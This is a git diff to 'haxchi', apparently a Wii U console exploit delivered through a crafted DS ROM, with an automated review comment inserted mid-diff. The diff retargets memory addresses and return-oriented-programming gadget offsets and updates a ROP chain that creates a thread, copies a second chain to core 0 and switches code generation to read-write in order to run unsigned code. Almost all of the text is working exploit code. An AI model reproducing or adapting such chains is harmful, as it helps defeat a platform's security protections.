diff --git a/haxchi.s b/haxchi.s
index 8555127..8987021 100644
--- a/haxchi.s
+++ b/haxchi.s
@@ -1,7 +1,7 @@
 .create "haxchi.srl", 0
 .nds
-hax_target_address equ 0x107968AC
+hax_target_address equ 0x1076FAA4
 code_target_address equ (0xF4000000 + 0xFD2000)
 .org 0x000
@@ -15,11 +15,11 @@ code_target_address equ (0xF4000000 + 0xFD2000)
 .org 0x020
 .word arm9_data ; ARM9 rom_offset
 .word 0x20000000 ; ARM9 entry_address
-.word 0xEBBC0E00 + code_target_address ; ARM9 ram_address
+.word 0xEBDDFC00 + code_target_address ; ARM9 ram_address
 .word arm9_data_end - arm9_data ; ARM9 size
 .word arm7_data ; ARM7 rom_offset
 .word 0x2000000 ; ARM7 entry_address
-.word 0xEBBC0E00 + hax_target_address ; ARM7 ram_address
+.word 0xEBDDFC00 + hax_target_address ; ARM7 ram_address
 .word arm7_data_end - arm7_data ; ARM7 size
 .org 0x080
diff --git a/haxchi_rop.s b/haxchi_rop.s
index b277cb4..9b1d316 100644
--- a/haxchi_rop.s
+++ b/haxchi_rop.s
@@ -1,23 +1,23 @@
 MAIN_STACKTOP equ (0x30796C00)
-CORE0_STACKORIG equ (0x2B566050) ; TEMP ?
-CORE0_ROPSTART equ (CORE0_STACKORIG + 0x2054) ; TEMP ?
+CORE0_STACKORIG equ (0x2B267B50) ; TEMP ?
+CORE0_ROPSTART equ (CORE0_STACKORIG + 0xAFC) ; TEMP ?
 RPX_OFFSET equ (0x01800000)
 COREINIT_OFFSET equ (- 0xFE3C00)
-LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02207084)
-MTCTR_R28_ADDI_R6x68_MR_R5R29_R4R22_R3R21_BCTRL equ (RPX_OFFSET + 0x02206FA8)
-BCTRL equ (RPX_OFFSET + 0x02206FBC)
-MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3610)
-LWZ_R0x104_MTLR_R0_ADDI_R1x100_BLR equ (RPX_OFFSET + 0x020E92C8)
-LWZ_R0x2054_MTLR_R0_ADDI_R1x2050_BLR equ (RPX_OFFSET + 0x02026DE0)
-LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA38)
-MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179168)
-LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B44)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02208F6C)
+MTCTR_R28_ADDI_R6x68_MR_R5R29_R4R22_R3R21_BCTRL equ (RPX_OFFSET + 0x02208E90)
+BCTRL equ (RPX_OFFSET + 0x02208EA4)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x0209A500)
+LWZ_R0x104_MTLR_R0_ADDI_R1x100_BLR equ (RPX_OFFSET + 0x020E0108)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x0209A12C)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A38AC)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0216FBF0)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02279BB8)
 MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL equ (COREINIT_OFFSET + 0x02002968)
-NERD_CREATETHREAD equ (RPX_OFFSET + 0x022219E8)
-NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E04)
-HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
-HACHI_APPLICATION_PTR equ (0x10c8c938)
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x02223C40)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222405C)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02007774)
+;HACHI_APPLICATION_PTR equ (0x10A6E038) ;probably wrong
 OS_CREATETHREAD equ (0x02025764 + COREINIT_OFFSET)
 OS_GETTHREADAFFINITY equ (0x020266A4 + COREINIT_OFFSET)
@@ -27,15 +27,15 @@ OSCODEGEN_SWITCHSECMODE equ (0x0201B2C0 + COREINIT_OFFSET)
 MEMCPY equ (0x02019BC8 + COREINIT_OFFSET)
 DC_FLUSHRANGE equ (0x02007B88 + COREINIT_OFFSET)
 IC_INVALIDATERANGE equ (0x02007CB0 + COREINIT_OFFSET)
-SYS_LAUNCHSETTINGS equ (0x03B9B25C)
-_EXIT equ (0x0229a240 + RPX_OFFSET)
-exit equ (0x022924b0 + RPX_OFFSET)
+;SYS_LAUNCHSETTINGS equ (0x03B9B25C)
+;_EXIT equ (0x0229a240 + RPX_OFFSET)
+;exit equ (0x022924b0 + RPX_OFFSET)
 OSFATAL equ (0x02015218 + COREINIT_OFFSET)
 CODEGEN_ADR equ 0x01800000
-NERD_THREADOBJECT equ (0x107968AC - 0x1000)
+NERD_THREADOBJECT equ (0x1076FAA4 - 0x1000)
 .macro set_sp,v
 .word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR
@@ -134,7 +134,7 @@ NERD_THREADOBJECT equ (0x107968AC - 0x1000)
-.create "haxchi_rop_hook.bin", 0x107968AC
+.create "haxchi_rop_hook.bin", 0x1076FAA4
 .arm.big
 rop_hook_start:
@@ -150,10 +150,9 @@ rop_hook_start:
 .arm.big
 rop_start:
-
- ; call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
-
- ; call_func SYS_LAUNCHSETTINGS, 0, 0, 0, 0
+ ;call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
+ ;call_func OSFATAL, 0x1007E7A8, 0, 0, 0
+ ;call_func SYS_LAUNCHSETTINGS, 0, 0, 0, 0
 ; call_func exit, 0, 0, 0, 0
 ; call_func _EXIT, 0, 0, 0, 0
 ; .word _EXIT
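Review bot: NERD_THREADOBJECT is rebuilt here from the raw literal 0x1076FAA4, the same address haxchi.s names hax_target_address and the .create line in the following hunk repeats, so this commit had to change one value in three places. Defining the address once and deriving the rest (`NERD_THREADOBJECT equ (hax_target_address - 0x1000)`, with the base symbol shared between the two sources if the build allows it) would turn the next address bump into a single edit. The same applies to the unnamed 0x1007E7A8 introduced in the @@ -163 hunk and reused in the commented-out OSFATAL call in the @@ -150 hunk; a descriptively named `equ` would document what that argument is, which the replaced 0xDEAD0DAD placeholder never needed. The `; TEMP ?` markers on CORE0_STACKORIG and CORE0_ROPSTART in the first hunk survive the update unchanged; if those values are now confirmed the markers should go, and if not, a comment stating what remains unverified would be more useful than a question mark.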
@@ -163,13 +162,15 @@ rop_start:
 ; .word 0xDEADBABE ; garbage
 ; .word 0xDEADBABE ; garbage
 ; .word 0xDEADBABE ; garbage
- call_func_6args NERD_CREATETHREAD, NERD_THREADOBJECT, LWZ_R0x2054_MTLR_R0_ADDI_R1x2050_BLR, 0xDEAD0DAD, thread_param, 0x0, 0x0
+ call_func_6args NERD_CREATETHREAD, NERD_THREADOBJECT, LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR, 0x1007E7A8, thread_param, 0x0, 0x0
  call_func OS_GETTHREADAFFINITY, NERD_THREADOBJECT, 0, 0, 0
  call_func MEMCPY, CORE0_ROPSTART, core0rop, core0rop_end - core0rop, 0x0
  call_func NERD_STARTTHREAD, NERD_THREADOBJECT, 0x0, 0x0, 0x0
+ ;call_func DC_FLUSHRANGE, 0x1076EAA4, 0x1000, 0x0, 0x0
  call_func BCTRL, 0x0, 0x0, 0x0, 0x0 ; infinite loop
 core0rop:
+ ; .word OSFATAL
  ; switch codegen to RW
  call_func OSCODEGEN_SWITCHSECMODE, 0x0, 0x0, 0x0, 0x0